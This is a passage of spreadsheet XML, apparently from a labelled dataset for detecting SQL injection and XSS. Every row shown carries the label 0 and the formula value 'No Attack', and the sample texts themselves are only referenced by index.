      </c>
      <c r="C24709" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24710" s="1" t="s">
        <v>22013</v>
      </c>
      <c r="B24710">
        <v>0</v>
      </c>
      <c r="C24710" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24711" s="1" t="s">
        <v>27822</v>
      </c>
      <c r="B24711">
        <v>0</v>
      </c>
      <c r="C24711" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24712" s="1" t="s">
        <v>33752</v>
      </c>
      <c r="B24712">
        <v>0</v>
      </c>
      <c r="C24712" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24713" s="1" t="s">
        <v>23429</v>
      </c>
      <c r="B24713">
        <v>0</v>
      </c>
      <c r="C24713" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24714" s="1" t="s">
        <v>33087</v>
      </c>
      <c r="B24714">
        <v>0</v>
      </c>
      <c r="C24714" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24715" s="1" t="s">
        <v>23659</v>
      </c>
      <c r="B24715">
        <v>0</v>
      </c>
      <c r="C24715" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24716" s="1" t="s">
        <v>32919</v>
      </c>
      <c r="B24716">
        <v>0</v>
      </c>
      <c r="C24716" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24717" s="1" t="s">
        <v>30626</v>
      </c>
      <c r="B24717">
        <v>0</v>
      </c>
      <c r="C24717" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24718" s="1" t="s">
        <v>30738</v>
      </c>
      <c r="B24718">
        <v>0</v>
      </c>
      <c r="C24718" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24719" s="1" t="s">
        <v>35878</v>
      </c>
      <c r="B24719">
        <v>0</v>
      </c>
      <c r="C24719" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24720" s="1" t="s">
        <v>20506</v>
      </c>
      <c r="B24720">
        <v>0</v>
      </c>
      <c r="C24720" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24721" s="1" t="s">
        <v>35572</v>
      </c>
      <c r="B24721">
        <v>0</v>
      </c>
      <c r="C24721" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24722" s="1" t="s">
        <v>21083</v>
      </c>
      <c r="B24722">
        <v>0</v>
      </c>
      <c r="C24722" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24723" s="1" t="s">
        <v>29620</v>
      </c>
      <c r="B24723">
        <v>0</v>
      </c>
      <c r="C24723" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24724" s="1" t="s">
        <v>33603</v>
      </c>
      <c r="B24724">
        <v>0</v>
      </c>
      <c r="C24724" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24725" s="1" t="s">
        <v>20079</v>
      </c>
      <c r="B24725">
        <v>0</v>
      </c>
      <c r="C24725" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24726" s="1" t="s">
        <v>27237</v>
      </c>
      <c r="B24726">
        <v>0</v>
      </c>
      <c r="C24726" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24727" s="1" t="s">
        <v>34061</v>
      </c>
      <c r="B24727">
        <v>0</v>
      </c>
      <c r="C24727" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24728" s="1" t="s">
        <v>26833</v>
      </c>
      <c r="B24728">
        <v>0</v>
      </c>
      <c r="C24728" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24729" s="1" t="s">
        <v>23533</v>
      </c>
      <c r="B24729">
        <v>0</v>
      </c>
      <c r="C24729" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24730" s="1" t="s">
        <v>23317</v>
      </c>
      <c r="B24730">
        <v>0</v>
      </c>
      <c r="C24730" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24731" s="1" t="s">
        <v>29785</v>
      </c>
      <c r="B24731">
        <v>0</v>
      </c>
      <c r="C24731" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24732" s="1" t="s">
        <v>21631</v>
      </c>
      <c r="B24732">
        <v>0</v>
      </c>
      <c r="C24732" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24733" s="1" t="s">
        <v>21872</v>
      </c>
      <c r="B24733">
        <v>0</v>
      </c>
      <c r="C24733" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24734" s="1" t="s">
        <v>22299</v>
      </c>
      <c r="B24734">
        <v>0</v>
      </c>
      <c r="C24734" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24735" s="1" t="s">
        <v>30488</v>
      </c>
      <c r="B24735">
        <v>0</v>
      </c>
      <c r="C24735" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24736" s="1" t="s">
        <v>31181</v>
      </c>
      <c r="B24736">
        <v>0</v>
      </c>
      <c r="C24736" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24737" s="1" t="s">
        <v>37456</v>
      </c>
      <c r="B24737">
        <v>0</v>
      </c>
      <c r="C24737" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24738" s="1" t="s">
        <v>33404</v>
      </c>
      <c r="B24738">
        <v>0</v>
      </c>
      <c r="C24738" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24739" s="1" t="s">
        <v>27760</v>
      </c>
      <c r="B24739">
        <v>0</v>
      </c>
      <c r="C24739" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24740" s="1" t="s">
        <v>32422</v>
      </c>
      <c r="B24740">
        <v>0</v>
      </c>
      <c r="C24740" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24741" s="1" t="s">
        <v>36728</v>
      </c>
      <c r="B24741">
        <v>0</v>
      </c>
      <c r="C24741" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24742" s="1" t="s">
        <v>32729</v>
      </c>
      <c r="B24742">
        <v>0</v>
      </c>
      <c r="C24742" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24743" s="1" t="s">
        <v>22556</v>
      </c>
      <c r="B24743">
        <v>0</v>
      </c>
      <c r="C24743" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24744" s="1" t="s">
        <v>9910</v>
      </c>
      <c r="B24744">
        <v>0</v>
      </c>
      <c r="C24744" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24745" s="1" t="s">
        <v>28707</v>
      </c>
      <c r="B24745">
        <v>0</v>
      </c>
      <c r="C24745" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24746" s="1" t="s">
        <v>27159</v>
      </c>
      <c r="B24746">
        <v>0</v>
      </c>
      <c r="C24746" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24747" s="1" t="s">
        <v>33974</v>
      </c>
      <c r="B24747">
        <v>0</v>
      </c>
      <c r="C24747" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24748" s="1" t="s">
        <v>27144</v>
      </c>
      <c r="B24748">
        <v>0</v>
      </c>
      <c r="C24748" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24749" s="1" t="s">
        <v>22514</v>
      </c>
      <c r="B24749">
        <v>0</v>
      </c>
      <c r="C24749" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24750" s="1" t="s">
        <v>20638</v>
      </c>
      <c r="B24750">
        <v>0</v>
      </c>
      <c r="C24750" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24751" s="1" t="s">
        <v>20173</v>
      </c>
      <c r="B24751">
        <v>0</v>
      </c>
      <c r="C24751" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24752" s="1" t="s">
        <v>33526</v>
      </c>
      <c r="B24752">
        <v>0</v>
      </c>
      <c r="C24752" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24753" s="1" t="s">
        <v>23222</v>
      </c>
      <c r="B24753">
        <v>0</v>
      </c>
      <c r="C24753" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24754" s="1" t="s">
        <v>33975</v>
      </c>
      <c r="B24754">
        <v>0</v>
      </c>
      <c r="C24754" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24755" s="1" t="s">
        <v>22221</v>
      </c>
      <c r="B24755">
        <v>0</v>
      </c>
      <c r="C24755" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24756" s="1" t="s">
        <v>30903</v>
      </c>
      <c r="B24756">
        <v>0</v>
      </c>
      <c r="C24756" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24757" s="1" t="s">
        <v>22034</v>
      </c>
      <c r="B24757">
        <v>0</v>
      </c>
      <c r="C24757" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24758" s="1" t="s">
        <v>34433</v>
      </c>
      <c r="B24758">
        <v>0</v>
      </c>
      <c r="C24758" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24759" s="1" t="s">
        <v>30502</v>
      </c>
      <c r="B24759">
        <v>0</v>
      </c>
      <c r="C24759" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24760" s="1" t="s">
        <v>36645</v>
      </c>
      <c r="B24760">
        <v>0</v>
      </c>
      <c r="C24760" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24761" s="1" t="s">
        <v>33842</v>
      </c>
      <c r="B24761">
        <v>0</v>
      </c>
      <c r="C24761" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24762" s="1" t="s">
        <v>34728</v>
      </c>
      <c r="B24762">
        <v>0</v>
      </c>
      <c r="C24762" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24763" s="1" t="s">
        <v>34184</v>
      </c>
      <c r="B24763">
        <v>0</v>
      </c>
      <c r="C24763" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24764" s="1" t="s">
        <v>31925</v>
      </c>
      <c r="B24764">
        <v>0</v>
      </c>
      <c r="C24764" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24765" s="1" t="s">
        <v>23145</v>
      </c>
      <c r="B24765">
        <v>0</v>
      </c>
      <c r="C24765" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24766" s="1" t="s">
        <v>34882</v>
      </c>
      <c r="B24766">
        <v>0</v>
      </c>
      <c r="C24766" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24767" s="1" t="s">
        <v>30120</v>
      </c>
      <c r="B24767">
        <v>0</v>
      </c>
      <c r="C24767" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24768" s="1" t="s">
        <v>33627</v>
      </c>
      <c r="B24768">
        <v>0</v>
      </c>
      <c r="C24768" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24769" s="1" t="s">
        <v>30287</v>
      </c>
      <c r="B24769">
        <v>0</v>
      </c>
      <c r="C24769" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24770" s="1" t="s">
        <v>28561</v>
      </c>
      <c r="B24770">
        <v>0</v>
      </c>
      <c r="C24770" s="7" t="str">
        <f t="shared" si="386"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24771" s="1" t="s">
        <v>21178</v>
      </c>
      <c r="B24771">
        <v>0</v>
      </c>
      <c r="C24771" s="7" t="str">
        <f t="shared" ref="C24771:C24834" si="387">IF(B24771=0,"No Attack", IF(B24771=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24772" s="1" t="s">
        <v>20052</v>
      </c>
      <c r="B24772">
        <v>0</v>
      </c>
      <c r="C24772" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24773" s="1" t="s">
        <v>28784</v>
      </c>
      <c r="B24773">
        <v>0</v>
      </c>
      <c r="C24773" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24774" s="1" t="s">
        <v>37070</v>
      </c>
      <c r="B24774">
        <v>0</v>
      </c>
      <c r="C24774" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24775" s="1" t="s">
        <v>31714</v>
      </c>
      <c r="B24775">
        <v>0</v>
      </c>
      <c r="C24775" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24776" s="1" t="s">
        <v>27327</v>
      </c>
      <c r="B24776">
        <v>0</v>
      </c>
      <c r="C24776" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24777" s="1" t="s">
        <v>36190</v>
      </c>
      <c r="B24777">
        <v>0</v>
      </c>
      <c r="C24777" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24778" s="1" t="s">
        <v>35000</v>
      </c>
      <c r="B24778">
        <v>0</v>
      </c>
      <c r="C24778" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24779" s="1" t="s">
        <v>29392</v>
      </c>
      <c r="B24779">
        <v>0</v>
      </c>
      <c r="C24779" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24780" s="1" t="s">
        <v>35377</v>
      </c>
      <c r="B24780">
        <v>0</v>
      </c>
      <c r="C24780" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24781" s="1" t="s">
        <v>21133</v>
      </c>
      <c r="B24781">
        <v>0</v>
      </c>
      <c r="C24781" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24782" s="1" t="s">
        <v>29770</v>
      </c>
      <c r="B24782">
        <v>0</v>
      </c>
      <c r="C24782" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24783" s="1" t="s">
        <v>22266</v>
      </c>
      <c r="B24783">
        <v>0</v>
      </c>
      <c r="C24783" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24784" s="1" t="s">
        <v>33948</v>
      </c>
      <c r="B24784">
        <v>0</v>
      </c>
      <c r="C24784" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24785" s="1" t="s">
        <v>32820</v>
      </c>
      <c r="B24785">
        <v>0</v>
      </c>
      <c r="C24785" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24786" s="1" t="s">
        <v>30420</v>
      </c>
      <c r="B24786">
        <v>0</v>
      </c>
      <c r="C24786" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24787" s="1" t="s">
        <v>34206</v>
      </c>
      <c r="B24787">
        <v>0</v>
      </c>
      <c r="C24787" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24788" s="1" t="s">
        <v>30432</v>
      </c>
      <c r="B24788">
        <v>0</v>
      </c>
      <c r="C24788" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24789" s="1" t="s">
        <v>28608</v>
      </c>
      <c r="B24789">
        <v>0</v>
      </c>
      <c r="C24789" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24790" s="1" t="s">
        <v>32336</v>
      </c>
      <c r="B24790">
        <v>0</v>
      </c>
      <c r="C24790" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24791" s="1" t="s">
        <v>34182</v>
      </c>
      <c r="B24791">
        <v>0</v>
      </c>
      <c r="C24791" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24792" s="1" t="s">
        <v>28275</v>
      </c>
      <c r="B24792">
        <v>0</v>
      </c>
      <c r="C24792" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24793" s="1" t="s">
        <v>21828</v>
      </c>
      <c r="B24793">
        <v>0</v>
      </c>
      <c r="C24793" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24794" s="1" t="s">
        <v>29798</v>
      </c>
      <c r="B24794">
        <v>0</v>
      </c>
      <c r="C24794" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24795" s="1" t="s">
        <v>29286</v>
      </c>
      <c r="B24795">
        <v>0</v>
      </c>
      <c r="C24795" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24796" s="1" t="s">
        <v>27880</v>
      </c>
      <c r="B24796">
        <v>0</v>
      </c>
      <c r="C24796" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24797" s="1" t="s">
        <v>31667</v>
      </c>
      <c r="B24797">
        <v>0</v>
      </c>
      <c r="C24797" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24798" s="1" t="s">
        <v>33442</v>
      </c>
      <c r="B24798">
        <v>0</v>
      </c>
      <c r="C24798" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24799" s="1" t="s">
        <v>36983</v>
      </c>
      <c r="B24799">
        <v>0</v>
      </c>
      <c r="C24799" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24800" s="1" t="s">
        <v>22954</v>
      </c>
      <c r="B24800">
        <v>0</v>
      </c>
      <c r="C24800" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24801" s="1" t="s">
        <v>21799</v>
      </c>
      <c r="B24801">
        <v>0</v>
      </c>
      <c r="C24801" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24802" s="1" t="s">
        <v>24145</v>
      </c>
      <c r="B24802">
        <v>0</v>
      </c>
      <c r="C24802" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24803" s="1" t="s">
        <v>28322</v>
      </c>
      <c r="B24803">
        <v>0</v>
      </c>
      <c r="C24803" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24804" s="1" t="s">
        <v>28474</v>
      </c>
      <c r="B24804">
        <v>0</v>
      </c>
      <c r="C24804" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24805" s="1" t="s">
        <v>23463</v>
      </c>
      <c r="B24805">
        <v>0</v>
      </c>
      <c r="C24805" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24806" s="1" t="s">
        <v>20361</v>
      </c>
      <c r="B24806">
        <v>0</v>
      </c>
      <c r="C24806" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24807" s="1" t="s">
        <v>20404</v>
      </c>
      <c r="B24807">
        <v>0</v>
      </c>
      <c r="C24807" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24808" s="1" t="s">
        <v>35761</v>
      </c>
      <c r="B24808">
        <v>0</v>
      </c>
      <c r="C24808" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24809" s="1" t="s">
        <v>30206</v>
      </c>
      <c r="B24809">
        <v>0</v>
      </c>
      <c r="C24809" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24810" s="1" t="s">
        <v>34541</v>
      </c>
      <c r="B24810">
        <v>0</v>
      </c>
      <c r="C24810" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24811" s="1" t="s">
        <v>20625</v>
      </c>
      <c r="B24811">
        <v>0</v>
      </c>
      <c r="C24811" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24812" s="1" t="s">
        <v>31330</v>
      </c>
      <c r="B24812">
        <v>0</v>
      </c>
      <c r="C24812" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="24813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24813" s="1" t="s">
        <v>28422</v>
      </c>
      <c r="B24813">
        <v>0</v>
      </c>
      <c r="C24813" s="7" t="str">
        <f t="shared" si="387"/>
        <v>No Attack</v>
      </c>
    </row>
